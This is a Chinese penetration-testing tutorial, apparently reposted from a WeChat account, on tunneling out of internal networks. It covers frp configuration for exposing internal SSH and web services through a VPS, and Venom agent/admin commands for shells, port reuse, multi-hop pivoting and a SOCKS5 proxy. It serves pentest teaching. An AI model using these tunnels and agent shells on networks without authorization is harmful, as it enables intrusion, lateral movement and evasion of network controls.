一、frp 内网穿透
https://github.com/fatedier/frp
将内网的服务代理到公网vps中
vps 上配置( frps.ini)
[common]
bind_port = 8005 # 隧道绑定的端口
token = 123456789 # 认证密码
vhost_http_port = 8007 # 内网http服务映射到公网vps上的port
vhost_https_port = 8007 #内网https服务映射到公网vps上的port
内网服务(frpc.ini)
[common]
server_addr = vps_ip
server_port = 8005
token = 123456789
[ssh] # 转发内网ssh 转发其他端口也一样 名称无所谓 type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 8006
[web] # 转发内网 http custom_domains = vps_ip
type = http
local_port = 80
vps 上执行
./frps -c frps.ini
客户端
./frpc -c frpc.ini
ssh 连接 vps对应ssh端口
web 服务
(内)
(外)
二、Venom
项目地址 https://github.com/Dliv3/Venom
基本使用
#admin端
admin -lport 8888
#客户端
agent -rhost ip -rport 8888
show # 查看已连接的shell。(包含拓扑
goto 1 # 序号
shell # 进行连接shell
端口复用
在其他端口不开放的情况下 可以端口复用
#windows下 ip为执行命令的ip
agent.exe -lhost ip -reuse-port 80
#监听
admin.exe -rhost ip -port 80
多级代理
起一个admin (Mac os 192.168.0.127)
./admin_macos_x64 -lport 8888
再启动一个agent (Windows。192.168.0.157) 连接admin
./agent.exe -rhost 192.168.0.127 -rport 8888
下层网络启动 agent (windows 下的虚拟机 192.168.56.105)
./agent_linux_x64 -lport 8888
Admin 下查看show
然后进入 1节点。也就是windows 然后连接虚拟机的agent
goto 1
connect 192.168.56.105 8888
最后 goto 2 就是进入了win 的虚拟机里了
sock5代理
在想要代理出流量的节点上执行如下
socks 端口号
执行后会在本地出现一个代理端口为 7777
然后用socks 连接工具连接上即可
这里用proxychains 访问的结果一致
作者:BY,文章来源:http://diego.team/
如文章对你有帮助,请支持点下“赞”“在看”
本文始发于微信公众号(HACK之道):内网渗透 | 常用的隧道代理技术
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论